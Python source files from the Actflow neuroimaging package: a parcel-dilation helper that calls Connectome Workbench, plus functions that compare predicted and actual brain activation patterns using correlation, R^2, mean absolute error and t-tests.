wb_command = 'wb_command -cifti-dilate ' + maskfile + '.dscalar.nii COLUMN ' + str(dilateMM) + ' ' + str(dilateMM) + ' ' + dilatedfile + '.dscalar.nii -left-surface ' + leftSurface + ' -right-surface ' + rightSurface
os.system(wb_command)
if __name__ == '__main__':
# default settings
dilateParcels(dilateMM=10,verbose=True) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/network_definitions/dilateParcels.py | dilateParcels.py |
import numpy as np
import scipy.stats
import sklearn as sklearn
def model_compare_predicted_to_actual(target_actvect, pred_actvect, comparison_type='conditionwise_compthenavg'):
nNodes=np.shape(target_actvect)[0]
nConds=np.shape(target_actvect)[1]
nSubjs=np.shape(target_actvect)[2]
## fullcompare_compthenavg - Compare-then-average across all conditions and all nodes between predicted and actual activations
if comparison_type=='fullcompare_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
corr_fullcomp_compthenavg = [np.corrcoef(target_actvect[:,:,subjNum].flatten(),pred_actvect[:,:,subjNum].flatten())[0,1] for subjNum in range(nSubjs)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_fullcomp_compthenavg = [sklearn.metrics.r2_score(target_actvect[:,:,subjNum].flatten(),pred_actvect[:,:,subjNum].flatten()) for subjNum in range(nSubjs)]
#mean_absolute_error: compute the absolute mean error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_fullcomp_compthenavg = [np.nanmean(np.abs(np.subtract(target_actvect[:,:,subjNum].flatten(),pred_actvect[:,:,subjNum].flatten()))) for subjNum in range(nSubjs)]
output = {'corr_vals':corr_fullcomp_compthenavg,'R2_vals':R2_fullcomp_compthenavg,'mae_vals':maeAcc_fullcomp_compthenavg}
## conditionwise_compthenavg - Compare-then-average condition-wise correlation between predicted and actual activations
if comparison_type=='conditionwise_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
corr_conditionwise_compthenavg_bynode = [[np.corrcoef(target_actvect[nodeNum,:,subjNum],pred_actvect[nodeNum,:,subjNum])[0,1] for subjNum in range(nSubjs)] for nodeNum in range(nNodes)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_conditionwise_compthenavg_bynode = [[sklearn.metrics.r2_score(target_actvect[nodeNum,:,subjNum],pred_actvect[nodeNum,:,subjNum]) for subjNum in range(nSubjs)] for nodeNum in range(nNodes)]
## mean_absolute_error: compute the absolute mean error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_bynode_compthenavg = [[np.nanmean(np.abs(np.subtract(target_actvect[nodeNum,:,subjNum],pred_actvect[nodeNum,:,subjNum]))) for subjNum in range(nSubjs)] for nodeNum in range(nNodes)]
output = {'corr_vals':corr_conditionwise_compthenavg_bynode,'R2_vals':R2_conditionwise_compthenavg_bynode,'mae_vals':maeAcc_bynode_compthenavg}
## conditionwise_avgthencomp - Average-then-compare condition-wise correlation between predicted and actual activations
if comparison_type=='conditionwise_avgthencomp':
corr_conditionwise_avgthencomp_bynode=[np.corrcoef(np.nanmean(target_actvect[nodeNum,:,:],axis=1),np.nanmean(pred_actvect[nodeNum,:,:],axis=1))[0,1] for nodeNum in range(nNodes)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_conditionwise_avgthencomp_bynode = [sklearn.metrics.r2_score(np.nanmean(target_actvect[nodeNum,:,:],axis=1),np.nanmean(pred_actvect[nodeNum,:,:],axis=1)) for nodeNum in range(nNodes)]
## mean_absolute_error: compute the absolute mean error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_bynode_avgthencomp =[np.nanmean(np.abs(np.subtract(np.nanmean(target_actvect[nodeNum,:,:],axis=1),np.nanmean(pred_actvect[nodeNum,:,:],axis=1)))) for nodeNum in range(nNodes)]
output = {'corr_conditionwise_avgthencomp_bynode':corr_conditionwise_avgthencomp_bynode,'R2_conditionwise_avgthencomp_bynode':R2_conditionwise_avgthencomp_bynode,'maeAcc_bynode_avgthencomp':maeAcc_bynode_avgthencomp}
## nodewise_compthenavg - Compare-then-average cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if comparison_type=='nodewise_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
corr_nodewise_compthenavg_bycond=[[np.corrcoef(target_actvect[:,taskNum,subjNum], pred_actvect[:,taskNum,subjNum])[0,1] for subjNum in range(nSubjs)] for taskNum in range(nConds)]
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_nodewise_compthenavg_bycond = [[sklearn.metrics.r2_score(target_actvect[:,taskNum,subjNum], pred_actvect[:,taskNum,subjNum]) for subjNum in range(nSubjs)] for taskNum in range(nConds)]
## mean_absolute_error: compute the absolute mean error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_nodewise_compthenavg_bycond = [[np.nanmean(np.abs(np.subtract(target_actvect[:,taskNum,subjNum], pred_actvect[:,taskNum,subjNum]))) for subjNum in range(nSubjs)] for taskNum in range(nConds)]
output = {'corr_vals':corr_nodewise_compthenavg_bycond,'R2_vals':R2_nodewise_compthenavg_bycond,'mae_vals':maeAcc_nodewise_compthenavg_bycond}
## nodewise_avgthencomp - Average-then-compare cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if comparison_type == 'nodewise_avgthencomp':
#Test for accuracy of actflow prediction, averaging across subjects before comparing ("average-then-compare")
corr_nodewise_avgthencomp_bycond=[np.corrcoef(np.nanmean(target_actvect[:,taskNum,:],axis=1),np.nanmean(pred_actvect[:,taskNum,:],axis=1))[0,1] for taskNum in range(nConds)]
output = {'corr_nodewise_avgthencomp_bycond':corr_nodewise_avgthencomp_bycond}
#R2 coefficient of determination, https://scikit-learn.org/stable/modules/model_evaluation.html#r2-score
R2_nodewise_avgthencomp_bycond = [sklearn.metrics.r2_score(np.nanmean(target_actvect[:,taskNum,:],axis=1),np.nanmean(pred_actvect[:,taskNum,:],axis=1)) for taskNum in range(nConds)]
## mean_absolute_error: compute the absolute mean error: mean(abs(a-p)), where a are the actual activations and p the predicted activations across all the nodes.
maeAcc_nodewise_avgthencomp_bycond = [np.nanmean(np.abs(np.subtract(np.nanmean(target_actvect[:,taskNum,:],axis=1),np.nanmean(pred_actvect[:,taskNum,:],axis=1)))) for taskNum in range(nConds)]
output = {'corr_nodewise_avgthencomp_bycond':corr_nodewise_avgthencomp_bycond,'R2_nodewise_avgthencomp_bycond':R2_nodewise_avgthencomp_bycond,'maeAcc_nodewise_avgthencomp_bycond':maeAcc_nodewise_avgthencomp_bycond}
return output | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/model_compare/model_compare_predicted_to_actual.py | model_compare_predicted_to_actual.py |
import numpy as np
import scipy.stats
from .model_compare_predicted_to_actual import *
def model_compare(target_actvect, model1_actvect, model2_actvect=None, full_report=False, print_report=True, print_by_condition=True, comparison_type='fullcompare_compthenavg', avgthencomp_fixedeffects=False, mean_absolute_error=True):
"""
Function to compare prediction accuracies between models. If model2_actvect=None then the predictions are compared against a simple null model (e.g., r=0 for Pearson correlation). Note that this function cannot yet handle time series prediction testing.
INPUTS
target_actvect: node x condition x subject NumPy array, consisting of the to-be-predicted values the model predictions will be compared to. This should be a vector of activity values for each node (separately for each condition).
model1_actvect: node x condition x subject NumPy array, consisting of Model 1's predicted values. This should be a vector of activity values for each node (separately for each condition).
model2_actvect: Optional. A node x condition x subject NumPy array, consisting of Model 2's predicted values. This should be a vector of activity values for each node (separately for each condition).
full_report: Calculate full report with all comparison types
print_report: Print the model comparison report to screen
print_by_condition: Print the model comparison report for each condition separately (only works if print_report is also True)
comparison_type: The kind of comparison to calculate (when full_report=False). Options are:
fullcompare_compthenavg – Compare-then-average correlation between predicted and actual activations across all conditions and nodes simultaneously. Variance between conditions and between nodes are treated equally via collapsing the data across those dimensions (e.g., 2 conditions across 360 nodes = 720 values). The comparisons are computed separately for each subject, then results are summarized via averaging.
conditionwise_compthenavg - Compare-then-average condition-wise correlation between predicted and actual activations. This is run separately for each node, computing the correlation between the activations across conditions (which characterizes each node's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging.
conditionwise_avgthencomp - Average-then-compare condition-wise correlation between predicted and actual activations. This is run separately for each node, computing the correlation between the cross-condition activation patterns (which characterizes each node's response profile). Activations are averaged across subjects prior to comparison (sometimes called a "fixed effects" analysis), boosting signal-to-noise ratio but likely reducing dimensionality (through inter-subject averaging) and reducing the ability to assess the consistency of the result across subjects relative to compare-then-average.
nodewise_compthenavg - Compare-then-average cross-node correlation between predicted and actual activations (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging (sometimes called a "random effects" analysis).
nodewise_avgthencomp - Average-then-compare cross-node correlation between predicted and actual activations (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed after averaging across subjects (sometimes called a "fixed effects" analysis).
[TODO: subjwise_compthenavg (each node & condition based on individual differences)]
avgthencomp_fixedeffects (default = False): if True, compute prediction accuracies after averaging across subjects (sometimes called a "fixed effects" analysis). This is set to False by default because it is generally best practice to run analyses with subject as a random effect, which helps generalize results to held-out data and provides p-values for estimating statistical confidence in the observed effect.
mean_absolute_error: if True, compute the absolute mean error: mean(abs(a-p)), where a are the actual activations
and p the predicted activations across all the nodes.
OUTPUT
output: a dictionary containing the following variables, depending on user input for full_report & reliability_type.
When full_report=True: output contains variables for all reliability_type runs.
For model2_actvect is None, these variables are:
conditionwise_compthenavg_output
corr_conditionwise_compthenavg_bynode
R2_conditionwise_compthenavg_bynode
nodewise_compthenavg_output
corr_nodewise_compthenavg_bycond
For when mean_absolute_error == True, these variables also include:
maeAcc_bynode_compthenavg
For when avgthencomp_fixedeffects == True, these variables also include:
conditionwise_avgthencomp_output
corr_conditionwise_avgthencomp_bynode
nodewise_avgthencomp_output
corr_nodewise_avgthencomp_bycond
For when model2_actvect is not None, these variables also include:
conditionwise_compthenavg_output_model2
corr_conditionwise_compthenavg_bynode_model2
R2_conditionwise_compthenavg_bynode_model2
nodewise_compthenavg_output_model2
corr_nodewise_compthenavg_bycond_model2
For when mean_absolute_error == True and model2_actvect is not None, these variables also include:
maeAcc_bynode_compthenavg_model2
For when avgthencomp_fixedeffects == True, these variables also include:
conditionwise_avgthencomp_output_model2
corr_conditionwise_avgthencomp_bynode_model2
nodewise_avgthencomp_output_model2
corr_nodewise_avgthencomp_bycond_model2
"""
nNodes=np.shape(target_actvect)[0]
nConds=np.shape(target_actvect)[1]
nSubjs=np.shape(target_actvect)[2]
scaling_note = "Note: Pearson r and Pearson r^2 are scale-invariant, while R^2 and MAE are not. R^2 units: percentage of the to-be-predicted data's unscaled variance, ranging from negative infinity (because prediction errors can be arbitrarily large) to positive 1. See https://scikit-learn.org/stable/modules/generated/sklearn.metrics.r2_score.html for more info."
output = {}
if print_report:
print("===Comparing prediction accuracies between models (similarity between predicted and actual brain activation patterns)===")
### Full comparison (condition-wise and node-wise combined) analyses
## fullcompare_compthenavg - Compare-then-average across all conditions and all nodes between predicted and actual activations
if full_report or comparison_type=='fullcompare_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
fullcomp_compthenavg_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='fullcompare_compthenavg')
#Add to output dictionary
output.update({'fullcomp_compthenavg_output':fullcomp_compthenavg_output,
'corr_fullcomp_compthenavg':fullcomp_compthenavg_output['corr_vals'],
'R2_fullcomp_compthenavg':fullcomp_compthenavg_output['R2_vals'],
'maeAcc_fullcomp_compthenavg':fullcomp_compthenavg_output['mae_vals']})
if model2_actvect is None:
## Test against null model
#Grand mean (across task) t-test
[tval_ActflowPredAcc_fullcomp,pval_ActflowPredAcc_fullcomp] = scipy.stats.ttest_1samp(np.ma.arctanh(fullcomp_compthenavg_output['corr_vals']),0.0)
#Add to output dictionary
output.update({'tval_ActflowPredAcc_fullcomp':tval_ActflowPredAcc_fullcomp,
'pval_ActflowPredAcc_fullcomp':pval_ActflowPredAcc_fullcomp})
else:
## Test model1 vs. model2 prediction accuracy
# Test for accuracy of MODEL2 actflow prediction, separately for each subject ("compare-then-average")
fullcomp_compthenavg_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='fullcompare_compthenavg')
#Grand mean (across task) t-test, model1 vs. model2 prediction accuracy
model1_means = np.ma.arctanh(fullcomp_compthenavg_output['corr_vals'])
model2_means = np.ma.arctanh(fullcomp_compthenavg_output_model2['corr_vals'])
[tval_ActflowPredAcc_corr_fullcomp_modelcomp,pval_ActflowPredAcc_corr_fullcomp_modelcomp] = scipy.stats.ttest_1samp(np.subtract(model1_means,model2_means),0.0)
#Add to output dictionary
output.update({'fullcomp_compthenavg_output_model2':fullcomp_compthenavg_output_model2,
'corr_fullcomp_compthenavg_model2':fullcomp_compthenavg_output_model2['corr_vals'],
'R2_fullcomp_compthenavg_model2':fullcomp_compthenavg_output_model2['R2_vals'],
'maeAcc_fullcomp_compthenavg_model2':fullcomp_compthenavg_output_model2['mae_vals'],
'tval_ActflowPredAcc_corr_fullcomp_modelcomp':tval_ActflowPredAcc_corr_fullcomp_modelcomp,
'pval_ActflowPredAcc_corr_fullcomp_modelcomp':pval_ActflowPredAcc_corr_fullcomp_modelcomp})
if print_report:
print(" ")
print("==Comparisons between predicted and actual activation patterns, across all conditions and nodes:==")
print("--Compare-then-average (calculating prediction accuracies before cross-subject averaging):")
print("Each comparison based on " + str(nConds) + " conditions across " + str(nNodes) + " nodes, p-values based on " + str(nSubjs) + " subjects (cross-subject variance in comparisons)")
if model2_actvect is None:
print_comparison_results(fullcomp_compthenavg_output, None, tval_ActflowPredAcc_fullcomp, pval_ActflowPredAcc_fullcomp, scaling_note=scaling_note)
else:
print_comparison_results(fullcomp_compthenavg_output, fullcomp_compthenavg_output_model2, tval_ActflowPredAcc_corr_fullcomp_modelcomp, pval_ActflowPredAcc_corr_fullcomp_modelcomp, scaling_note=scaling_note)
### Condition-wise analyses (as opposed to node-wise)
## conditionwise_compthenavg - Compare-then-average condition-wise correlation between predicted and actual activations (only if more than one task condition)
if full_report or comparison_type=='conditionwise_compthenavg':
if nConds == 1:
print("WARNING: Condition-wise calculations cannot be performed with only a single condition")
else:
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
conditionwise_compthenavg_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='conditionwise_compthenavg')
#Add to output dictionary
output.update({'conditionwise_compthenavg_output':conditionwise_compthenavg_output,
'corr_conditionwise_compthenavg_bynode':conditionwise_compthenavg_output['corr_vals'],
'R2_conditionwise_compthenavg_bynode':conditionwise_compthenavg_output['R2_vals'],
'mae_conditionwise_compthenavg_bynode':conditionwise_compthenavg_output['mae_vals']})
if model2_actvect is None:
## Test against null model
#Grand mean (across task) t-test
[tval_ActflowPredAcc_nodemean,pval_ActflowPredAcc_nodemean] = scipy.stats.ttest_1samp(np.nanmean(np.ma.arctanh(conditionwise_compthenavg_output['corr_vals']),axis=0),0.0)
else:
## Test model1 vs. model2 prediction accuracy
# Test for accuracy of MODEL2 actflow prediction, separately for each subject ("compare-then-average")
conditionwise_compthenavg_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='conditionwise_compthenavg')
#Grand mean (across task) t-test, model1 vs. model2 prediction accuracy
model1_means = np.nanmean(np.ma.arctanh(conditionwise_compthenavg_output['corr_vals']),axis=0)
model2_means = np.nanmean(np.ma.arctanh(conditionwise_compthenavg_output_model2['corr_vals']),axis=0)
[tval_ActflowPredAcc_nodemean,pval_ActflowPredAcc_nodemean] = scipy.stats.ttest_1samp(np.subtract(model1_means,model2_means),0.0)
#Add to output dictionary
output.update({'conditionwise_compthenavg_output_model2':conditionwise_compthenavg_output_model2,
'corr_conditionwise_compthenavg_bynode_model2':conditionwise_compthenavg_output_model2['corr_vals'],
'R2_conditionwise_compthenavg_bynode_model2':conditionwise_compthenavg_output_model2['R2_vals'],
'mae_conditionwise_compthenavg_bynode_model2':conditionwise_compthenavg_output_model2['mae_vals']})
if print_report:
print(" ")
print("==Condition-wise comparisons between predicted and actual activation patterns (calculated for each node separetely):==")
print("--Compare-then-average (calculating prediction accuracies before cross-subject averaging):")
print("Each correlation based on N conditions: " + str(nConds) + ", p-values based on N subjects (cross-subject variance in correlations): " + str(nSubjs))
if model2_actvect is None:
print_comparison_results(conditionwise_compthenavg_output, None, tval_ActflowPredAcc_nodemean, pval_ActflowPredAcc_nodemean, scaling_note=scaling_note)
else:
print_comparison_results(conditionwise_compthenavg_output, conditionwise_compthenavg_output_model2, tval_ActflowPredAcc_nodemean, pval_ActflowPredAcc_nodemean, scaling_note=scaling_note)
## conditionwise_avgthencomp - Average-then-compare condition-wise correlation between predicted and actual activations (only if more than one task condition)
if avgthencomp_fixedeffects or comparison_type=='conditionwise_avgthencomp':
if nConds == 1:
print("WARNING: Condition-wise calculations cannot be performed with only a single condition")
else:
#Test for accuracy of actflow prediction, separately for each subject ("average-then-compare")
conditionwise_avgthencomp_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='conditionwise_avgthencomp')
corr_conditionwise_avgthencomp_bynode = conditionwise_avgthencomp_output['corr_conditionwise_avgthencomp_bynode']
#Add to output dictionary
output.update({'conditionwise_avgthencomp_output':conditionwise_avgthencomp_output, 'corr_conditionwise_avgthencomp_bynode':corr_conditionwise_avgthencomp_bynode})
if model2_actvect is not None:
# Test for accuracy of MODEL2 actflow prediction, after averaging across subjects ("average-then-compare")
conditionwise_avgthencomp_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='conditionwise_avgthencomp')
corr_conditionwise_avgthencomp_bynode_model2 = conditionwise_avgthencomp_output_model2['corr_conditionwise_avgthencomp_bynode']
#Add to output dictionary
output.update({'conditionwise_avgthencomp_output_model2':conditionwise_avgthencomp_output_model2, 'corr_conditionwise_avgthencomp_bynode_model2':corr_conditionwise_avgthencomp_bynode_model2})
if print_report:
print(" ")
print("==Condition-wise correlations between predicted and actual activation patterns (calculated for each node separetely):==")
print("--Average-then-compare (calculating prediction accuracies after cross-subject averaging):")
print("Each correlation based on N conditions: " + str(nConds))
if model2_actvect is None:
print("Mean Pearson r=" + str("%.2f" % np.tanh(np.nanmean(np.ma.arctanh(corr_conditionwise_avgthencomp_bynode)))))
else:
meanRModel1=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_conditionwise_avgthencomp_bynode))))
print("Model1 Mean Pearson r=" + str("%.2f" % meanRModel1))
meanRModel2=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_conditionwise_avgthencomp_bynode_model2))))
print("Model2 Mean Pearson r=" + str("%.2f" % meanRModel2))
meanRModelDiff=meanRModel1-meanRModel2
print("R-value difference = " + str("%.2f" % meanRModelDiff))
if mean_absolute_error:
maeAcc_bynode_avgthencomp = conditionwise_avgthencomp_output['maeAcc_bynode_avgthencomp']
#Add to output dictionary
output.update({'maeAcc_bynode_avgthencomp':maeAcc_bynode_avgthencomp})
if print_report:
print(" ")
print("==Condition-wise Mean Absolute Error (MAE) between predicted and actual activation patterns (calculated for each node separateley):==")
print("--Average-then-compare (calculating MAE accuracies after cross-subject averaging):")
print("Each MAE based on N conditions: " + str(nConds))
print("Mean MAE=" + str("%.2f" % np.nanmean(maeAcc_bynode_avgthencomp)))
### Node-wise analyses (as opposed to condition-wise)
## nodewise_compthenavg - Compare-then-average cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if full_report or comparison_type=='nodewise_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
nodewise_compthenavg_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='nodewise_compthenavg')
corr_nodewise_compthenavg_bycond = nodewise_compthenavg_output['corr_vals']
#Add to output dictionary
output.update({'nodewise_compthenavg_output':nodewise_compthenavg_output,
'corr_nodewise_compthenavg_bycond':nodewise_compthenavg_output['corr_vals'],
'R2_nodewise_compthenavg_bycond':nodewise_compthenavg_output['R2_vals'],
'mae_nodewise_compthenavg_bycond':nodewise_compthenavg_output['mae_vals']})
if model2_actvect is None:
## Test against null model
#Run t-tests to quantify cross-subject consistency, by condition, Pearson correlations
tval_ActflowPredAccCorr_bycond=np.zeros(nConds)
pval_ActflowPredAccCorr_bycond=np.zeros(nConds)
for condNum in range(nConds):
[tval_ActflowPredAccCorr_bycond[condNum],pval_ActflowPredAccCorr_bycond[condNum]] = scipy.stats.ttest_1samp(np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum]),0.0)
#Grand mean (across task) t-test
[tval_ActflowPredAcc_condmean,pval_ActflowPredAcc_condmean] = scipy.stats.ttest_1samp(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond),axis=0),0.0)
else:
## Test model1 vs. model2 prediction accuracy
# Test for accuracy of MODEL2 actflow prediction, separately for each subject ("compare-then-average")
nodewise_compthenavg_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='nodewise_compthenavg')
corr_nodewise_compthenavg_bycond_model2 = nodewise_compthenavg_output_model2['corr_vals']
#Add to output dictionary
output.update({'nodewise_compthenavg_output_model2':nodewise_compthenavg_output_model2,
'corr_nodewise_compthenavg_bycond_model2':nodewise_compthenavg_output_model2['corr_vals'],
'R2_nodewise_compthenavg_bycond_model2':nodewise_compthenavg_output_model2['R2_vals'],
'mae_nodewise_compthenavg_bycond_model2':nodewise_compthenavg_output_model2['mae_vals']})
#Run t-tests to quantify cross-subject consistency, by condition, Pearson correlations
tval_ActflowPredAccCorr_Model1Vs2_bycond=np.zeros(nConds)
pval_ActflowPredAccCorr_Model1Vs2_bycond=np.zeros(nConds)
for condNum in range(nConds):
model1Vals=np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum])
model2Vals=np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2[condNum])
[tval_ActflowPredAccCorr_Model1Vs2_bycond[condNum],pval_ActflowPredAccCorr_Model1Vs2_bycond[condNum]] = scipy.stats.ttest_1samp(np.subtract(model1Vals,model2Vals),0.0)
#Grand mean (across nodes) t-test, model1 vs. model2 prediction accuracy
model1_means=np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond),axis=0)
model2_means=np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2),axis=0)
[tval_ActflowPredAcc_condmean,pval_ActflowPredAcc_condmean] = scipy.stats.ttest_1samp(np.subtract(model1_means,model2_means),0.0)
if print_report:
print(" ")
print("==Node-wise (spatial) correlations between predicted and actual activation patterns (calculated for each condition separetely):==")
print("--Compare-then-average (calculating prediction accuracies before cross-subject averaging):")
print("Each correlation based on N nodes: " + str(nNodes) + ", p-values based on N subjects (cross-subject variance in correlations): " + str(nSubjs))
if model2_actvect is None:
print("Cross-condition mean r=" + str("%.2f" % np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond))))) + ", t-value vs. 0: " + str("%.2f" % tval_ActflowPredAcc_condmean) + ", p-value vs. 0: " + str(pval_ActflowPredAcc_condmean))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
print("Condition " + str(condNum+1) + ": r=" + str("%.2f" % np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum])))) + ", t-value vs. 0: " + str("%.2f" % tval_ActflowPredAccCorr_bycond[condNum]) + ", p-value vs. 0: " + str(pval_ActflowPredAccCorr_bycond[condNum]))
else:
meanRModel1=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond))))
print("Model1 mean Pearson r=" + str("%.2f" % meanRModel1))
meanRModel2=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2))))
print("Model2 mean Pearson r=" + str("%.2f" % meanRModel2))
meanRModelDiff=meanRModel1-meanRModel2
print("R-value difference = " + str("%.2f" % meanRModelDiff))
print("Model1 vs. Model2 T-value: " + str("%.2f" % tval_ActflowPredAcc_condmean) + ", p-value: " + str(pval_ActflowPredAcc_condmean))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
model1R=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum])))
model2R=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2[condNum])))
print("Condition " + str(condNum+1) + ": Model 1 r=" + str("%.2f" % model1R) + ", Model 2 r=" + str("%.2f" % model2R) + ", Model 1 vs. 2 R-value difference =" + str("%.2f" % np.subtract(model1R, model2R)) + ", t-value Model1 vs. Model2: " + str("%.2f" % tval_ActflowPredAccCorr_Model1Vs2_bycond[condNum]) + ", p-value vs. 0: " + str(pval_ActflowPredAccCorr_Model1Vs2_bycond[condNum]))
## nodewise_avgthencomp - Average-then-compare cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if avgthencomp_fixedeffects or comparison_type=='nodewise_avgthencomp':
#Test for accuracy of actflow predictions, after averaging across subjects ("average-then-compare")
nodewise_avgthencomp_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='nodewise_avgthencomp')
corr_nodewise_avgthencomp_bycond = nodewise_avgthencomp_output['corr_nodewise_avgthencomp_bycond']
#Add to output dictionary
output.update({'nodewise_avgthencomp_output':nodewise_avgthencomp_output, 'corr_nodewise_avgthencomp_bycond':corr_nodewise_avgthencomp_bycond})
if model2_actvect is not None:
#Test for accuracy of actflow predictions, after averaging across subjects ("average-then-compare")
nodewise_avgthencomp_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='nodewise_avgthencomp')
corr_nodewise_avgthencomp_bycond_model2 = nodewise_avgthencomp_output_model2['corr_nodewise_avgthencomp_bycond']
#Add to output dictionary
output.update({'nodewise_avgthencomp_output_model2':nodewise_avgthencomp_output_model2, 'corr_nodewise_avgthencomp_bycond_model2':corr_nodewise_avgthencomp_bycond_model2})
if print_report:
print(" ")
print("==Node-wise (spatial) correlations between predicted and actual activation patterns (calculated for each condition separetely):==")
print("--Average-then-compare (calculating prediction accuracies after cross-subject averaging):")
print("Each correlation based on N nodes: " + str(nNodes) + ", p-values based on N subjects (cross-subject variance in correlations): " + str(nSubjs))
if model2_actvect is None:
print("Mean r=" + str("%.2f" % np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_avgthencomp_bycond)))))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
print("Condition " + str(condNum+1) + ": r=" + str("%.2f" % corr_nodewise_avgthencomp_bycond[condNum]))
else:
model1MeanR=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_avgthencomp_bycond)))
model2MeanR=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_avgthencomp_bycond_model2)))
print("Mean Model1 r=" + str("%.2f" % model1MeanR))
print("Mean Model2 r=" + str("%.2f" % model2MeanR))
print("Mean Model1 vs. Model2 R-value difference=" + str("%.2f" % (model1MeanR - model2MeanR)))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
print("Condition " + str(condNum+1) + ": Model1 r=" + str("%.2f" % corr_nodewise_avgthencomp_bycond[condNum]) + ", Model2 r=" + str("%.2f" % corr_nodewise_avgthencomp_bycond_model2[condNum]) + ", Model 1 vs. Model2 R-value difference=" + str("%.2f" % np.subtract(corr_nodewise_avgthencomp_bycond[condNum], corr_nodewise_avgthencomp_bycond_model2[condNum])))
return output
def print_comparison_results(comparison_output, comparison_output_model2, tvals, pvals, scaling_note=""):
if comparison_output_model2 is None:
print(" ")
print("Mean Pearson r = " + str("%.2f" % np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(comparison_output['corr_vals']))))) + ", t-value vs. 0: " + str("%.2f" % tvals) + ", p-value vs. 0: " + str(pvals))
print(" ")
print("Mean % variance explained (R^2 score, coeff. of determination) = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output['R2_vals']))))
print(" ")
print("Mean MAE (mean absolute error) = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output['mae_vals']))))
print(" ")
print(scaling_note)
else:
print(" ")
meanRModel1=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(comparison_output['corr_vals']))))
print("Model1 mean Pearson r=" + str("%.2f" % meanRModel1))
meanRModel2=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(comparison_output_model2['corr_vals']))))
print("Model2 mean Pearson r=" + str("%.2f" % meanRModel2))
meanRModelDiff=meanRModel1-meanRModel2
print("R-value difference = " + str("%.2f" % meanRModelDiff))
print("Model1 vs. Model2 T-value: " + str("%.2f" % tvals) + ", p-value: " + str(pvals))
print(" ")
meanR2Model1 = np.nanmean(np.nanmean(comparison_output['R2_vals']))
print("Model1 mean % predicted variance explained R^2=" + str("%.2f" % meanR2Model1))
meanR2Model2 = np.nanmean(np.nanmean(comparison_output_model2['R2_vals']))
print("Model2 mean % predicted variance explained R^2=" + str("%.2f" % meanR2Model2))
meanR2ModelDiff=meanR2Model1-meanR2Model2
print("R^2 difference = " + str("%.2f" % meanR2ModelDiff))
print(" ")
print("Model1 mean MAE = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output['mae_vals']))))
print("Model2 mean MAE = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output_model2['mae_vals']))))
print("Model1 vs. Model2 mean MAE difference = " + str("%.2f" % np.subtract(np.nanmean(np.nanmean(comparison_output['mae_vals'])), np.nanmean(np.nanmean(comparison_output_model2['mae_vals'])))))
print(" ")
